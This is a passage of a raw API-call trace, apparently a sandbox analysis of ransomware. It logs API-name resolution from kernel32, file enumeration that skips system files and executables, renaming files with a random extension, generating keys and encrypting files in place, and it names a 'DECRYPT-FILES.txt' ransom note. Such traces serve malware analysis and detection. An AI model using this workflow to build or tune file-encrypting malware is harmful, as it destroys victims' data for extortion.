returned="DeleteBoundaryDescriptor" [0080.230] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0080.230] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0080.230] lstrlenA (lpString="DELETEFIBER") returned 11 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0080.230] lstrlenA (lpString="DELETEFILEA") returned 11 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0080.230] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0080.230] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0080.230] lstrlenA (lpString="DELETEFILEW") returned 11 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0080.230] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0080.230] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0080.230] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0080.230] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0080.230] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0080.230] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0080.230] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0080.230] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0080.230] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0080.230] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0080.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0080.231] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0080.231] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0080.231] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0080.231] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0080.231] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0080.231] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0080.231] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0080.231] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0080.231] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0080.231] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0080.231] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0080.231] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0080.231] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0080.231] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0080.231] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0080.231] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0080.231] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0080.231] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0080.231] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0080.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0080.232] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0080.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0080.232] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0080.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0080.232] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0080.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0080.232] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0080.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0080.232] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0080.232] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms") returned 128 [0080.232] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms.5lJAv") returned 134 [0080.232] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5d696d521de238c3.customDestinations-ms.5lJAv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5d696d521de238c3.customdestinations-ms.5ljav"), dwFlags=0x0) returned 1 [0080.233] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.233] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.234] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.234] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dc975e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dc975e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.customDestinations-ms", cAlternateFileName="7E4DCA~1.CUS")) returned 1 [0080.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="DECRYPT-FILES.txt") returned -1 [0080.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="autorun.inf") returned -1 [0080.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="boot.ini") returned -1 [0080.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="desktop.ini") returned -1 [0080.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="ntuser.dat") returned -1 [0080.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="iconcache.db") returned -1 [0080.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="bootsect.bak") returned -1 [0080.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="ntuser.dat.log") returned -1 [0080.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="thumbs.db") returned -1 [0080.234] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms", lpString2="Bootfont.bin") returned -1 [0080.234] lstrlenW (lpString="7e4dca80246863e3.customDestinations-ms") returned 38 [0080.234] lstrcmpiW (lpString1="customDestinations-ms", lpString2="lnk") returned -1 [0080.234] lstrcmpiW (lpString1="customDestinations-ms", lpString2="exe") returned -1 [0080.234] lstrcmpiW (lpString1="customDestinations-ms", lpString2="sys") returned -1 [0080.234] lstrcmpiW (lpString1="customDestinations-ms", lpString2="dll") returned -1 [0080.234] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 90 [0080.234] lstrlenW (lpString="7e4dca80246863e3.customDestinations-ms") returned 38 [0080.234] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0080.234] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="7e4dca80246863e3.customDestinations-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" [0080.234] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.235] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0080.235] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=24) returned 1 [0080.235] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0080.235] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0080.235] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0080.235] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0080.235] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.237] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0080.237] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0080.238] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.238] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0080.238] CloseHandle (hObject=0x464) returned 1 [0080.238] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.238] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0080.239] CloseHandle (hObject=0x0) returned 0 [0080.239] CloseHandle (hObject=0x460) returned 1 [0080.240] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.240] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.240] GetTickCount () returned 0x114c8bc [0080.240] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0080.240] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0080.241] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.241] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.241] lstrlenA (lpString="kernel32.dll") returned 12 [0080.241] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.241] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.241] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.241] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.241] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.241] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.241] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.241] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.241] lstrlenA (lpString="ADDATOMA") returned 8 [0080.241] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.241] lstrlenA (lpString="ADDATOMW") returned 8 [0080.241] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.241] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.241] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.242] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.242] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.242] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.242] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.242] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.242] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.242] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.242] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.242] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.242] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.242] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.242] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.242] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.242] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.242] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.242] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.242] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.242] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.242] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.242] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.243] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.243] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.243] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.243] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.243] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.243] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.243] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.243] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.243] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.243] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.243] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.243] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.243] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.244] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.244] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.244] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.244] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.244] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.244] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.244] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.244] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.244] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.244] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.244] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.244] lstrcpyA (in: lpString1=0x3f2c7fc, 